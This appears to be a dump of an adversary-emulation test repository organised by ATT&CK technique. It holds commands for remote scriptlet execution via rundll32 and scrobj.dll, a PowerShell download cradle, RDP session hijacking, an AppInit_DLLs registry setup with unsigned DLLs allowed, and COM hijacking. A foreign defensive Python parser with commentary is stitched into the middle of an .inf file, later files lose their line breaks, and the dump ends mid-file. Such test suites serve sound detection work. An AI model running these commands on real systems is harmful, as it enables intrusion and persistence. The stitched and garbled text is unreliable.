└── tests
    ├── T1060
    │   ├── HelloWorld.bat
    │   ├── t1060.ps1
    │   └── T1060.yaml
    ├── T1179
    │   ├── bin
    │   │   ├── T1179x64.dll
    │   │   └── T1179x86.dll
    │   ├── src
    │   │   ├── x64
    │   │   │   └── T1179.dll
    │   │   ├── Win32
    │   │   │   └── T1179.dll
    │   │   ├── T1179
    │   │   │   ├── T1179.vcxproj.user
    │   │   │   └── T1179.vcxproj.filters
    │   │   └── T1179.sln
    │   └── T1179.todo
    ├── T1055
    │   └── src
    │       └── x64
    │           └── T1055.dll
    ├── T1059
    │   ├── echo-art-fish.sh
    │   └── T1059.yaml
    ├── T1138
    │   ├── src
    │   │   ├── AtomicShim.zip
    │   │   ├── AtomicTest.dll
    │   │   ├── AtomicShimx86.sdb
    │   │   ├── AtomicTest.dll.cpp
    │   │   ├── AtomicTest.cs
    │   │   └── README.md
    │   └── T1138.todo
    ├── T1154
    │   ├── echo-art-fish.sh
    │   ├── T1154.todo
    │   └── T1154.md
    ├── T1050
    │   ├── bin
    │   │   └── AtomicService.exe
    │   ├── src
    │   │   └── AtomicService.cs
    │   └── T1050.yaml
    ├── T1117
    │   ├── bin
    │   │   └── AllTheThingsx86.dll
    │   ├── RegSvr32.sct
    │   └── T1117.todo
    ├── T1122
    │   ├── src
    │   │   ├── test.bat
    │   │   ├── COMHijackCleanup.reg
    │   │   ├── AtomicRedTeam.sct
    │   │   └── COMHijack.reg
    │   └── T1122.todo
    ├── T1193
    │   ├── PhishingAttachment.xlsm
    │   └── T1193.yaml
    ├── T1086
    │   └── payloads
    │       ├── test.ps1
    │       ├── test.xml
    │       ├── test.xsl
    │       ├── test.sct
    │       └── mshta.sct
    ├── T1127
    │   └── src
    │       ├── msxsl-xmlfile.xml
    │       ├── msxsl-script.xsl
    │       └── T1127.csproj
    ├── T1166
    │   ├── hello.c
    │   └── T1166.todo
    ├── T1103
    │   ├── T1103.reg
    │   └── T1103.todo
    ├── T1176
    │   ├── manifest.json
    │   ├── T1176.todo
    │   └── inline.js
    ├── T1152
    │   ├── T1152.todo
    │   └── T1152.md
    ├── T1169
    │   ├── T1169.todo
    │   └── T1169.md
    ├── T1170
    │   ├── T1170.sct
    │   └── T1170.yaml
    ├── T1191
    │   ├── T1191.inf
    │   ├── T1191_uacbypass.inf
    │   ├── T1191.sct
    │   └── T1191.todo
    ├── T1163
    │   ├── T1163.todo
    │   └── T1163.md
    ├── T1074
    │   ├── T1074.todo
    │   ├── T1074.md
    │   └── Discovery.bat
    ├── T1128
    │   └── T1128.todo
    ├── T1139
    │   ├── T1139.yaml
    │   └── T1139.md
    ├── T1118
    │   ├── T1118.todo
    │   └── src
    │       └── T1118.cs
    ├── T1005
    │   ├── T1005.todo
    │   └── T1005.md
    ├── T1076
    │   └── T1076.todo
    ├── T1085
    │   ├── T1085.todo
    │   └── T1085.sct
    ├── T1042
    │   └── T1042.todo
    ├── T1115
    │   ├── T1115.todo
    │   ├── T1115.yaml
    │   └── T1115.md
    ├── T1056
    │   └── T1056.todo
    ├── T1007
    │   ├── T1007.yaml
    │   └── T1007.md
    ├── T1216
    │   ├── T1216.todo
    │   └── payloads
    │       └── T1216.sct
    ├── T1030
    │   ├── T1030.yaml
    │   └── T1030.md
    ├── T1214
    │   ├── T1214.yaml
    │   └── T1214.md
    ├── T1134
    │   └── T1134.todo
    ├── T1057
    │   └── T1057.yaml
    ├── T1147
    │   ├── T1147.yaml
    │   └── T1147.md
    ├── T1088
    │   └── T1088.todo
    ├── T1090
    │   ├── T1090.todo
    │   └── T1090.md
    ├── T1010
    │   ├── T1010.todo
    │   └── T1010.md
    ├── T1114
    │   ├── T1114.todo
    │   ├── T1114.md
    │   └── Get-Inbox.ps1
    ├── T1144
    │   └── T1144.yaml
    ├── T1153
    │   └── T1153.todo
    ├── T1027
    │   └── T1027.yaml
    ├── T1009
    │   ├── T1009.yaml
    │   └── T1009.md
    ├── T1046
    │   └── T1046.yaml
    ├── T1069
    │   └── T1069.yaml
    ├── T1082
    │   └── T1082.yaml
    ├── T1160
    │   └── T1160.todo
    ├── T1135
    │   └── T1135.yaml
    ├── T1151
    │   ├── T1151.yaml
    │   └── T1151.md
    ├── T1207
    │   └── T1207.todo
    ├── T1119
    │   └── T1119.yaml
    ├── T1036
    │   └── T1036.yaml
    ├── T1049
    │   └── T1049.yaml
    ├── T1217
    │   └── T1217.todo
    ├── T1206
    │   └── T1206.todo
    ├── T1016
    │   └── T1016.yaml
    ├── T1156
    │   └── T1156.yaml
    ├── T1047
    │   └── T1047.yaml
    ├── T1124
    │   └── T1124.yaml
    ├── T1018
    │   └── T1018.yaml
    ├── T1053
    │   └── T1053.yaml
    ├── T1098
    │   └── T1098.todo
    ├── T1062
    │   ├── T1062.todo
    │   └── T1062.md
    ├── T1223
    │   └── T1223.todo
    ├── T1064
    │   ├── T1064.yaml
    │   └── T1064.md
    ├── T1174
    │   └── T1174.todo
    ├── T1123
    │   └── T1123.todo
    ├── T1113
    │   └── T1113.yaml
    ├── T1031
    │   └── T1031.yaml
    ├── T1148
    │   └── T1148.yaml
    ├── T1070
    │   ├── T1070.yaml
    │   └── T1070.md
    ├── T1141
    │   ├── T1141.yaml
    │   └── T1141.md
    ├── T1132
    │   ├── T1132.yaml
    │   └── T1132.md
    ├── T1022
    │   └── T1022.yaml
    ├── T1101
    │   ├── T1101.todo
    │   └── T1101.md
    ├── T1142
    │   ├── T1142.yaml
    │   └── T1142.md
    ├── T1146
    │   └── T1146.yaml
    ├── T1180
    │   └── T1180.todo
    ├── T1150
    │   └── T1150.yaml
    ├── T1165
    │   ├── T1165.todo
    │   └── T1165_emond.plist
    ├── T1164
    │   └── T1164.todo
    ├── T1159
    │   └── T1159.todo
    ├── T1140
    │   └── T1140.todo
    ├── T1065
    │   └── T1065.todo
    ├── T1075
    │   └── T1075.todo
    ├── T1130
    │   └── T1130.todo
    ├── T1201
    │   └── T1201.todo
    ├── T1081
    │   └── T1081.todo
    ├── T1035
    │   ├── T1035.yaml
    │   └── T1035.md
    ├── T1197
    │   └── T1197.yaml
    ├── T1002
    │   ├── T1002.yaml
    │   └── T1002.todo
    ├── T1110
    │   └── T1110.todo
    ├── T1126
    │   └── T1126.todo
    ├── T1145
    │   ├── T1145.todo
    │   └── T1145.md
    ├── T1096
    │   └── T1096.todo
    ├── T1077
    │   └── T1077.todo
    ├── T1063
    │   └── T1063.yaml
    ├── T1087
    │   └── T1087.yaml
    ├── T1183
    │   └── T1183.todo
    ├── T1033
    │   └── T1033.yaml
    ├── T1137
    │   └── T1137.yaml
    ├── T1099
    │   └── T1099.todo
    ├── T1155
    │   └── T1155.todo
    ├── T1105
    │   └── T1105.todo
    ├── T1202
    │   └── T1202.todo
    ├── T1218
    │   └── T1218.todo
    ├── T1048
    │   └── T1048.yaml
    ├── T1014
    │   └── T1014.todo
    ├── T1004
    │   └── T1004.todo
    └── T1037
        ├── T1037.todo
        └── T1037.yaml

/tests/T1060/HelloWorld.bat:
--------------------------------------------------------------------------------
echo "Hello World"
--------------------------------------------------------------------------------

/tests/T1179/bin/T1179x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1179/bin/T1179x64.dll
--------------------------------------------------------------------------------

/tests/T1179/bin/T1179x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1179/bin/T1179x86.dll
--------------------------------------------------------------------------------

/tests/T1055/src/x64/T1055.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1055/src/x64/T1055.dll
--------------------------------------------------------------------------------

/tests/T1059/echo-art-fish.sh:
--------------------------------------------------------------------------------
#! /bin/bash
echo So long, and thanks for all the fish! > /tmp/art-fish.txt
--------------------------------------------------------------------------------

/tests/T1138/src/AtomicShim.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1138/src/AtomicShim.zip
--------------------------------------------------------------------------------

/tests/T1138/src/AtomicTest.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1138/src/AtomicTest.dll
--------------------------------------------------------------------------------

/tests/T1154/echo-art-fish.sh:
--------------------------------------------------------------------------------
#! /bin/bash
echo So long, and thanks for all the fish! > /tmp/art-fish.txt
--------------------------------------------------------------------------------

/tests/T1179/src/x64/T1179.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1179/src/x64/T1179.dll
--------------------------------------------------------------------------------

/tests/T1050/bin/AtomicService.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1050/bin/AtomicService.exe
--------------------------------------------------------------------------------

/tests/T1138/src/AtomicShimx86.sdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1138/src/AtomicShimx86.sdb
--------------------------------------------------------------------------------

/tests/T1179/src/Win32/T1179.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1179/src/Win32/T1179.dll
--------------------------------------------------------------------------------

/tests/T1117/bin/AllTheThingsx86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1117/bin/AllTheThingsx86.dll
--------------------------------------------------------------------------------

/tests/T1122/src/test.bat:
--------------------------------------------------------------------------------
REM Register the per-user COM hijack, trigger it through certutil, then remove it again.
reg import COMHijack.reg
certutil.exe -CAInfo
reg import COMHijackCleanup.reg
--------------------------------------------------------------------------------

/tests/T1193/PhishingAttachment.xlsm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1193/PhishingAttachment.xlsm
--------------------------------------------------------------------------------

/tests/T1086/payloads/test.ps1:
--------------------------------------------------------------------------------
# Test download cradle
write-host -ForegroundColor Cyan "$(Get-Date -Format s) Download Cradle test success!`n"
--------------------------------------------------------------------------------

/tests/T1127/src/msxsl-xmlfile.xml:
--------------------------------------------------------------------------------
(XML markup not preserved in this copy; only the text content remains)
AtomicRedTeam
--------------------------------------------------------------------------------

/tests/T1166/hello.c:
--------------------------------------------------------------------------------
/* Harmless setuid test binary: prints, sleeps for a minute, prints again.
   The headers are the ones printf() and sleep() need. */
#include <stdio.h>
#include <unistd.h>

int main()
{
    printf("Hello\n");
    sleep(60);
    printf("Don't run random binaries!\n");
    return 0;
}
--------------------------------------------------------------------------------

/tests/T1179/src/T1179/T1179.vcxproj.user:
--------------------------------------------------------------------------------
(XML markup not preserved in this copy)
--------------------------------------------------------------------------------

/tests/T1086/payloads/test.xml:
--------------------------------------------------------------------------------
(XML markup not preserved in this copy; only the embedded PowerShell remains)
write-host -ForegroundColor Cyan "$(Get-Date -Format s) Download Cradle test success!`n"
--------------------------------------------------------------------------------

/tests/T1103/T1103.reg:
--------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll"
"LoadAppInit_DLLs"=dword:00000001
"RequireSignedAppInit_DLLs"=dword:00000000
--------------------------------------------------------------------------------

/tests/T1122/src/COMHijackCleanup.reg:
--------------------------------------------------------------------------------
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
--------------------------------------------------------------------------------

/tests/T1176/manifest.json:
--------------------------------------------------------------------------------
{
  "name": "Minimum Viable Malicious Extension",
  "description": "Base Level Extension",
  "version": "1.0",
  "manifest_version": 2,
  "content_scripts": [
    {
      "matches": [
        ""
      ],
      "js": [
        "inline.js"
      ]
    }
  ]
}
--------------------------------------------------------------------------------

/tests/T1152/T1152.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1152
display_name: Launchctl

atomic_tests:
- name: Launchctl
  description: |
    Use launchctl submit to start Calculator as a launchd job labelled "evil".

  supported_platforms:
    - macos

  executor:
    name: sh
    command: |
      launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
--------------------------------------------------------------------------------

/tests/T1060/t1060.ps1:
--------------------------------------------------------------------------------
# Create a shortcut in the all-users Startup folder that points at the test batch file,
# then delete it again so the host is left clean; the file creation is the observable.
$TargetFile = "\mate\tests\t1060\HelloWorld.bat"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()

Remove-Item -Path $ShortcutFile -Force
--------------------------------------------------------------------------------

/tests/T1138/T1138.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1138
display_name: Application Shimming

atomic_tests:
- name: Application Shim Installation
  description: |
    Installs a shim database (AtomicShimx86.sdb) that injects AtomicTest.dll into the custom application AtomicTest.exe; see src/README.md.

  supported_platforms:
    - windows

  executor:
    name: command_prompt
    command: |
      sdbinst.exe AtomicShimx86.sdb
--------------------------------------------------------------------------------

/tests/T1169/T1169.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1169
display_name: SUDO

atomic_tests:
- name: Sudo usage
  description: |
    Common sudo enumeration methods.

  supported_platforms:
    - macos
    - linux

  executor:
    name: sh
    command: |
      sudo -l
      sudo su
      cat /etc/sudoers
      vim /etc/sudoers
--------------------------------------------------------------------------------

/tests/T1122/T1122.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1122
display_name: Component Object Model Hijacking

atomic_tests:
- name: Component Object Model Hijacking
  description: |
    Register a per-user (HKCU) COM object that shadows the CLSID certutil.exe uses, trigger it with certutil.exe -CAInfo, then remove the registration.

  supported_platforms:
    - windows
  executor:
    name: command_prompt
    command: |
      reg import ..\src\COMHijack.reg
      certutil.exe -CAInfo
      reg import ..\src\COMHijackCleanup.reg
--------------------------------------------------------------------------------

/tests/T1170/T1170.sct:
--------------------------------------------------------------------------------
(XML markup not preserved in this copy)
--------------------------------------------------------------------------------

/tests/T1122/src/AtomicRedTeam.sct:
--------------------------------------------------------------------------------
(XML markup not preserved in this copy)
--------------------------------------------------------------------------------

/tests/T1191/T1191.inf:
--------------------------------------------------------------------------------
; Author: @NickTyrer - https://twitter.com/NickTyrer/status/958450014111633408

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1191/T1191.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
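The two Registry-driven tests above, T1103 (AppInit_DLLs) and T1122 (COM hijack), both arrive as .reg files, so a defender reviewing this corpus needs to read that format and know which values make the entry dangerous. As an added example that is not part of this repository, the Python below parses the .reg subset those files use and flags the two conditions that matter: an AppInit_DLLs list that is actually armed (LoadAppInit_DLLs=1) while unsigned DLLs are accepted (RequireSignedAppInit_DLLs=0), and CLSIDs registered under HKEY_CURRENT_USER, which COM resolves ahead of the machine-wide entry. T1103.reg is taken verbatim from the page. COMHijack.reg is not shown on the page, so the stand-in below is constructed from the keys that COMHijackCleanup.reg deletes; its scrobj.dll InprocServer32, ThreadingModel and example.invalid scriptlet URL are assumptions.

```python
import re
from typing import Dict, List

# T1103.reg exactly as shown on this page.
T1103_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll"
"LoadAppInit_DLLs"=dword:00000001
"RequireSignedAppInit_DLLs"=dword:00000000
'''

# Constructed stand-in for T1122/src/COMHijack.reg (its text is not on this
# page): the keys are the ones COMHijackCleanup.reg deletes, the URL is made up.
COMHIJACK_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\Windows\\System32\\scrobj.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://example.invalid/AtomicRedTeam.sct"

[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
'''

VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
CLSID_RE = re.compile(
    r"^HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\(\{[0-9A-Fa-f-]{36}\})(?:\\(.+))?$", re.I)
# Same suffix for the native key and the Wow6432Node key.
APPINIT_SUFFIX = r"\microsoft\windows nt\currentversion\windows"


def _unescape(s: str) -> str:
    return s.replace('\\"', '"').replace("\\\\", "\\")


def _parse_value(raw: str):
    raw = raw.strip()
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return _unescape(raw[1:-1])
    return raw  # hex:, expand-string etc. are kept as written


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Parse the .reg subset these tests use: [key] and [-key] headers,
    "name"="string" and @= default values, dword: numbers. A key the file
    deletes comes back with the single marker value "__delete__"."""
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1]
            current = name.lstrip("-")
            keys[current] = {"__delete__": True} if name.startswith("-") else {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            vname = "@" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
            keys[current][vname] = _parse_value(m.group(2))
    return keys


def check_appinit(keys: Dict[str, Dict[str, object]]) -> List[str]:
    """Report AppInit_DLLs lists that are armed (LoadAppInit_DLLs=1) and say
    whether unsigned DLLs are accepted (RequireSignedAppInit_DLLs=0)."""
    findings = []
    for key, vals in keys.items():
        if vals.get("__delete__") or not key.lower().endswith(APPINIT_SUFFIX):
            continue
        dlls = str(vals.get("AppInit_DLLs", "")).replace(",", " ").split()
        if dlls and vals.get("LoadAppInit_DLLs") == 1:
            signing = "unsigned allowed" if vals.get("RequireSignedAppInit_DLLs") == 0 else "signed only"
            findings.append(f"{key}: loads {dlls} into every user32-linked process ({signing})")
    return findings


def check_user_clsids(keys: Dict[str, Dict[str, object]]) -> Dict[str, Dict[str, str]]:
    """COM resolves HKEY_CURRENT_USER classes before HKEY_LOCAL_MACHINE, so a
    per-user CLSID redirects every process that instantiates it. Return
    {clsid: {subkey: default value}} for each user-hive CLSID the file adds."""
    found: Dict[str, Dict[str, str]] = {}
    for key, vals in keys.items():
        m = CLSID_RE.match(key)
        if m and not vals.get("__delete__"):
            clsid, sub = m.group(1).upper(), m.group(2) or ""
            found.setdefault(clsid, {})[sub] = str(vals.get("@", ""))
    return found


if __name__ == "__main__":
    for f in check_appinit(parse_reg(T1103_REG)):
        print("AppInit:", f)
    for clsid, subs in check_user_clsids(parse_reg(COMHIJACK_REG)).items():
        print("User-hive CLSID", clsid, subs)
```

Run it directly and it prints one AppInit finding for T1103.reg and two user-hive CLSIDs for the constructed COMHijack.reg: the certutil CLSID {372FCE38-...} whose TreatAs points at {00000001-...FEEDACDC}, and that CLSID's scrobj.dll server plus ScriptletURL. Feeding COMHijackCleanup.reg through check_user_clsids returns nothing, because deleted keys are skipped. One caveat when triaging T1103: Windows 8 and later disable the AppInit_DLLs mechanism entirely when Secure Boot is on, so the .reg import succeeds there but nothing is loaded.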
--------------------------------------------------------------------------------

/tests/T1138/src/AtomicTest.dll.cpp:
--------------------------------------------------------------------------------
// dllmain.cpp : Defines the entry point for the DLL application.
// Shows a message box when the shimmed process (AtomicTest.exe) loads this DLL.
#include "stdafx.h"
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        MessageBox(0, L"Atomic Shim DLL Test!", 0, 0);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
--------------------------------------------------------------------------------

/tests/T1163/T1163.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1163
display_name: rc.common

atomic_tests:
- name: rc.common
  description: |
    Append an osascript command to /etc/rc.common so that it runs at system startup.

    [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)

  supported_platforms:
    - macos

  executor:
    name: sh
    command: |
      echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
--------------------------------------------------------------------------------

/tests/T1074/T1074.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1074
display_name: Data Staged

atomic_tests:
- name: Stage data from Discovery.bat
  description: |
    Use PowerShell to download Discovery.bat and stage its contents in a local file (c:\windows\pi.log).

  supported_platforms:
    - windows

  executor:
    name: powershell
    command: |
      (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat') > c:\windows\pi.log
--------------------------------------------------------------------------------

/tests/T1086/payloads/test.xsl:
--------------------------------------------------------------------------------
(XML markup not preserved in this copy)
--------------------------------------------------------------------------------

/tests/T1086/payloads/test.sct:
--------------------------------------------------------------------------------
(XML markup not preserved in this copy)
--------------------------------------------------------------------------------

/tests/T1127/src/msxsl-script.xsl:
--------------------------------------------------------------------------------
(XSL markup not preserved in this copy; only the embedded script block remains)
function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    return nodelist.nextNode().xml;
}
--------------------------------------------------------------------------------

/tests/T1128/T1128.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1128
display_name: Netsh Helper DLL

atomic_tests:
- name: Netsh Helper DLL Registration
  description: |
    Netsh interacts with other operating system components using dynamic-link library (DLL) files

  supported_platforms:
    - windows

  input_arguments:
    helper_file:
      description: Path to DLL
      type: Path
      default: C:\Path\file.dll

  executor:
    name: command_prompt
    command: |
      netsh.exe add helper #{helper_file}
--------------------------------------------------------------------------------

/tests/T1138/src/AtomicTest.cs:
--------------------------------------------------------------------------------
using System;

/*
mkdir C:\Tools
copy AtomicTest.Dll C:\Tools\AtomicTest.dll

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /platform:x86 AtomicTest.cs

From an elevated prompt:

sdbinst.exe AtomicShimx86.sdb
AtomicTest.exe
sdbinst -u AtomicShimx86.sdb

*/


public class AtomicTest
{
    public static void Main()
    {
        Console.WriteLine("Boom!");
    }

    public static bool Thing()
    {
        Console.WriteLine("Things!");
        return true;
    }
}
--------------------------------------------------------------------------------

/tests/T1103/T1103.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1103
display_name: AppInit DLLs

atomic_tests:
- name: Install AppInit Shim
  description: |
    AppInit_DLLs is a mechanism that loads an arbitrary list of DLLs into every user-mode process that loads user32.dll. The accompanying T1103.reg enables it and turns off the signature requirement.

  supported_platforms:
    - windows

  input_arguments:
    registry_file:
      description: Windows Registry File
      type: Path
      default: T1103.reg

  executor:
    name: command_prompt
    command: |
      reg.exe import #{registry_file}
--------------------------------------------------------------------------------

/tests/T1139/T1139.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1139
display_name: Bash History
tactic: Credential Access
description: Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file.

atomic_tests:
- name: Enumerate bash history
  description: |
    Grep the bash history file for the given patterns and write the matches to a file.

  supported_platforms:
    - linux
    - macos

  executor_nix:
    name: sh
    command: |
      cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
--------------------------------------------------------------------------------

/tests/T1166/T1166.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1166
display_name: Setuid and Setgid

atomic_tests:
- name: Setuid and Setgid
  description: |
    Setuid and Setgid

  supported_platforms:
    - macos
    - centos
    - ubuntu
    - linux

  input_arguments:
    payload:
      description: hello.c payload
      type: path
      default: hello.c

  executor:
    name: manual
    steps: |
      1. make hello

      2. sudo chown root hello

      3. sudo chmod u+s hello

      4. ./hello
--------------------------------------------------------------------------------

/tests/T1118/T1118.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1118
display_name: InstallUtil

atomic_tests:
- name: InstallUtil uninstall method call
  description: |
    Compiles T1118.cs to a DLL and runs it through InstallUtil.exe /U, which executes the assembly's Uninstall method.
  supported_platforms:
    - windows
  input_arguments:
    filename:
      description: location of the payload
      type: Path
      default: T1118.dll
  executor:
    name: command_prompt
    command: |
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename}
--------------------------------------------------------------------------------

/tests/T1138/src/README.md:
--------------------------------------------------------------------------------
## Application Compatibility Shims

[Reference](https://blogs.technet.microsoft.com/askperf/2011/06/17/demystifying-shims-or-using-the-app-compat-toolkit-to-make-your-old-stuff-work-with-your-new-stuff/)

[Additional References](https://sdb.tools/resources.html)

All files are contained in the .zip.

Otherwise you can roll your own.

##### This shim injects a DLL named AtomicTest.DLL from C:\Tools into an application named AtomicTest.exe
##### Specifically, one with an Original_FileName and Internal_Name of AtomicTest.exe
##### The easiest way to create that is to compile and use the C# sample AtomicTest.cs
--------------------------------------------------------------------------------

/tests/T1005/T1005.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1005
display_name: Data from Local System

atomic_tests:
- name: Search macOS Safari Cookies
  description: |
    This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.

  supported_platforms:
    - macos

  input_arguments:
    search_string:
      description: String to search Safari cookies to find.
      type: string
      default: coinbase

  executor:
    name: sh
    command: |
      cd ~/Library/Cookies
      grep -q "#{search_string}" "Cookies.binarycookies"
--------------------------------------------------------------------------------

/tests/T1076/T1076.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1076
display_name: Remote Desktop Protocol

atomic_tests:
- name: RDP
  description: |
    [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization


  supported_platforms:
    - windows

  executor:
    name: command_prompt
    command: |
      query user
      sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
      net start sesshijack
      sc.exe delete sesshijack
--------------------------------------------------------------------------------

/tests/T1085/T1085.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1085
display_name: Rundll32
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
  description: |
    Test execution of a remote script using rundll32.exe
  supported_platforms:
    - windows
  input_arguments:
    file_url:
      description: location of the payload
      type: Url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
  executor:
    name: command_prompt
    command: |
      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
--------------------------------------------------------------------------------

/tests/T1179/T1179.todo:
-------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1179 3 | display_name: Hooking 4 | 5 | atomic_tests: 6 | - name: Hook PowerShell TLS Encrypt/Decrypt Messages 7 | description: | 8 | Hooks functions in PowerShell to read TLS Communications 9 | supported_platforms: 10 | - windows 11 | input_arguments: 12 | file_name: 13 | description: Dll To Inject 14 | type: Path 15 | default: C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll 16 | server_name: 17 | description: TLS Server To Test Get Request 18 | type: Url 19 | default: https://www.example.com 20 | executor: 21 | name: powershell 22 | command: | 23 | mavinject $pid /INJECTRUNNING #{file_name} 24 | curl #{server_name} 25 | -------------------------------------------------------------------------------- /tests/T1042/T1042.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1042 3 | display_name: Change Default File Association 4 | 5 | atomic_tests: 6 | - name: Change Default File Association 7 | description: | 8 | Change Default File Association From cmd.exe 9 | 10 | supported_platforms: 11 | - windows 12 | input_arguments: 13 | extension_to_change: 14 | description: File Extension To Hijack 15 | type: String 16 | default: .wav 17 | target_exenstion_handler: 18 | description: Thing To Open 19 | type: Path 20 | default: C:\Program Files\Windows Media Player\wmplayer.exe 21 | executor: 22 | name: command_prompt 23 | command: | 24 | cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}" 25 | -------------------------------------------------------------------------------- /tests/T1154/T1154.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1154 3 | display_name: Trap 4 | 5 | atomic_tests: 6 | - name: Trap 7 | description: | 8 | After exiting the shell, the script will download and execute. 
